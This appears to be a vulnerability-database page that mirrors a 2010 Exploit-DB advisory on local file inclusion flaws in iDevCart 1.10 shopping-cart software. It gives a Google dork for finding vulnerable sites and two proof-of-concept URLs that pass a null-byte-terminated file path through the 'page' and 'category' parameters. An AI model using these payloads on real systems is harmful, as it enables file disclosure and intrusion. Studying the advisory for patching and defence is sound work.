header-logo
Suggest Exploit
vendor:
iDevCart
by:
v3n0m
9,3
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: iDevCart
Affected Version From: 1.10
Affected Version To: 1.10
Patch Exists: NO
Related CWE: N/A
CPE: a:idevspot:idevcart:1.10
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

iDevSpot iDevCart 1.10 Multiple Local File Inclusion Vulnerabilities

iDevCart 1.10 is vulnerable to multiple local file inclusion vulnerabilities. An attacker can exploit these vulnerabilities to include arbitrary local files on the server, which can lead to remote code execution.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in file operations.
Source

Exploit-DB raw data:

     )   )            )                     (   (         (   (    (       )     ) 
  ( /(( /( (       ( /(  (       (    (     )\ ))\ )      )\ ))\ ) )\ ) ( /(  ( /( 
  )\())\()))\ )    )\()) )\      )\   )\   (()/(()/(  (  (()/(()/((()/( )\()) )\())
 ((_)((_)\(()/(   ((_)((((_)(  (((_)(((_)(  /(_))(_)) )\  /(_))(_))/(_))(_)\|((_)\ 
__ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_))  _((_)_ ((_)
\ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \|   \| __| _ \ |  |_ _|| \| | |/ / 
 \ V / (_) || (_ |\ V / / _ \  | (__ / _ \ |   /| |) | _||   / |__ | | | .` | ' <  
  |_| \___/  \___| |_| /_/ \_\  \___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\
										.WEB.ID
-----------------------------------------------------------------------
 iDevSpot iDevCart 1.10 Multiple Local File Inclusion Vulnerabilities
-----------------------------------------------------------------------
Author  	: v3n0m (v3n0m666[at]live[dot]com)
Site    	: http://yogyacarderlink.web.id/
Date		: December, 24-2010
Location	: Jakarta, Indonesia
Time Zone	: GMT +7:00

Application	: iDevCart
Price		: $49.95
Version		: 1.10 Other versions may also be affected
Vendor  	: http://www.idevspot.com/
Google Dorks	: "iDevCart 1.10 Shopping Cart Software"

Exploit & p0c
_____________

**[LFI]
http://127.0.0.1/[path]/index.php?page=[LFI]%00
http://127.0.0.1/[path]/index.php?page=browse&category=[LFI]%00
_________________________________________________

All YOGYACARDERLINK Crew & My Beloved Jovita Andy
_________________________________________________

Navigation

Suggest Exploit

Services By CQR